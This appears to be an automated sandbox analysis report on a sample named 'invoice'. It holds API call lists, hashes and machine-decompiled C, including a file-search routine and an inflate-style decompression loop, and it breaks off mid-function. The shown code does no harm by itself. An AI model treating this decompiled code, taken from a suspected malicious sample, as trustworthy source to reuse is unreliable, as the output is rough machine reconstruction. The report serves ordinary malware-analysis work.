0x10001e6b
0x10001e6e
0x10001e75
0x10001e76
0x10001e7c
0x10001e7c
0x00000000
0x10001e7c
0x10001e70
0x10001e73
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10001d7f
0x10001c41
0x10001c41
0x10001c42
0x10001d67
0x00000000
0x10001d67
0x10001c48
0x10001c49
0x00000000
0x00000000
0x10001c51
0x10001c51
0x10001c54
0x10001c9f
0x00000000
0x10001c9f
0x10001c56
0x10001c56
0x10001c59
0x10001c83
0x10001c86
0x10001c89
0x10001d59
0x10001d59
0x10001d59
0x10001c8f
0x10001c8f
0x10001c8f
0x10001d5f
0x00000000
0x10001d5f
0x10001c5c
0x10001c5c
0x10001c5d
0x10001c80
0x10001c82
0x10001c82
0x00000000
0x10001c82
0x10001c5f
0x10001c5f
0x10001c62
0x10001c7c
0x00000000
0x10001c7c
0x10001c64
0x10001c64
0x10001c67
0x10001c78
0x00000000
0x10001c78
0x10001c69
0x10001c69
0x10001c6a
0x10001c74
0x00000000
0x10001c74
0x10001c6d
0x10001c6e
0x00000000
0x00000000
0x10001c70
0x00000000
0x10001c70
0x00000000
0x10001b20
0x10001ac3
0x10001ac6
0x10001af5
0x10001af9
0x10001b00
0x10001b07
0x10001b0a
0x10001b0d
0x00000000
0x10001b0d
0x10001ac8
0x10001ac9
0x10001ae4
0x10001aeb
0x10001aee
0x00000000
0x10001aee
0x10001ace
0x00000000
0x10001ad4
0x10001ad4
0x10001adb
0x00000000
0x10001adb
0x10001ace
0x10001cc4
0x10001cc9
0x10001cce
0x10001cd2
0x100020ef
0x100020f5
0x10001ce4
0x10001ce6
0x10001ce7
0x1000201a
0x1000201a
0x1000201d
0x10002020
0x1000203d
0x10002043
0x10002045
0x1000204b
0x10002062
0x10002062
0x10002062
0x1000206f
0x10002075
0x10002078
0x1000207e
0x10002080
0x10002083
0x10002085
0x1000208c
0x10002091
0x10002094
0x10002096
0x1000209b
0x100020ad
0x100020ad
0x1000209b
0x10002094
0x10002083
0x100020b3
0x100020b6
0x100020c0
0x100020c8
0x100020d4
0x100020da
0x100020dd
0x1000200f
0x1000200f
0x00000000
0x1000200f
0x100020e3
0x100020e9
0x100020e9
0x00000000
0x00000000
0x100020eb
0x100020eb
0x100020eb
0x100020eb
0x00000000
0x100020b8
0x100020b8
0x100020be
0x00000000
0x00000000
0x00000000
0x100020be
0x100020b6
0x1000204e
0x10002054
0x10002056
0x1000205c
0x00000000
0x00000000
0x00000000
0x1000205c
0x10002022
0x10002029
0x1000202f
0x10002035
0x00000000
0x10002035
0x10001ced
0x10001cee
0x10001ff9
0x10001ff9
0x10001fff
0x10002002
0x00000000
0x00000000
0x10002009
0x1000200e
0x00000000
0x1000200e
0x10001cf5
0x00000000
0x00000000
0x10001cfb
0x10001cfb
0x10001d04
0x10001d09
0x10001d0f
0x00000000
0x00000000
0x10001d15
0x10001d22
0x10001d28
0x10001d32
0x10001d38
0x10001d40
0x10001d50
0x00000000
0x10001d50

APIs

Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
GlobalFree.KERNEL32(00000000), ref: 10001BCC
GlobalFree.KERNEL32(?), ref: 10001CC4
GlobalFree.KERNEL32(?), ref: 10001CC9
GlobalFree.KERNEL32(?), ref: 10001CCE
GlobalFree.KERNEL32(00000000), ref: 10001E76
lstrcpyA.KERNEL32(?,?), ref: 10001FCA

Memory Dump Source

Source File: 00000001.00000002.8818214645.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.8818183154.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.8818247570.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.8818279279.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_invoice.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 4cb5dc2aea9cf7ab25a3b1e4be44dc9197e12157622a09bbe3f88e709afef852
Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
Opcode Fuzzy Hash: 4cb5dc2aea9cf7ab25a3b1e4be44dc9197e12157622a09bbe3f88e709afef852
Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 004026F8 Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004026F8(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402AC1(2), _t19 - 0x1c8) != 0xffffffff) {
					E00405EC3(__edi, _t6);
					_push(_t19 - 0x19c);
					_push(__esi);
					E00405F65();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402710
0x00402724
0x0040272f
0x00402730
0x0040286f
0x00402712
0x00402712
0x00402714
0x00402716
0x00402716
0x00402954
0x00402960

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 35474e701519af4a3bfe5b21ab3a1074e282d3bfb0b95cafabb6a5a8f21aa47d
Instruction ID: 5589ad20af1132df25b1d4da55578e461c11660e8300270abb34f4e41d1b37c2
Opcode Fuzzy Hash: 35474e701519af4a3bfe5b21ab3a1074e282d3bfb0b95cafabb6a5a8f21aa47d
Instruction Fuzzy Hash: 8BF0A0726041119AD710E7B49999EEEB778DB21324F60057BE685F20C1C6B88A469B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00406742 Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406742(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406EB1( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4083f8; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4083f8; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00406F19( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406E71))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e388;
												if( *0x42e388 != 0) {
													L22:
													_t412 =  *0x40a40c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a410; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d204; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d200; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d208;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d688;
													if(_t416 < 0x42d688) {
														L15:
														__eflags = _t416 - 0x42d444;
														_t438 = 8;
														if(_t416 > 0x42d444) {
															__eflags = _t416 - 0x42d608;
															if(_t416 >= 0x42d608) {
																__eflags = _t416 - 0x42d668;
																if(_t416 < 0x42d668) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00406F19(0x42d208, 0x120, 0x101, 0x40840c, 0x40844c, 0x42d204, 0x40a40c, 0x42db08, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d208, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d208 + _t440;
														E00406F19(0x42d208, 0x1e, 0, 0x40848c, 0x4084c8, 0x42d200, 0x40a410, 0x42db08, _t448 - 8);
														 *0x42e388 =  *0x42e388 + 1;
														__eflags =  *0x42e388;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405AB9( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
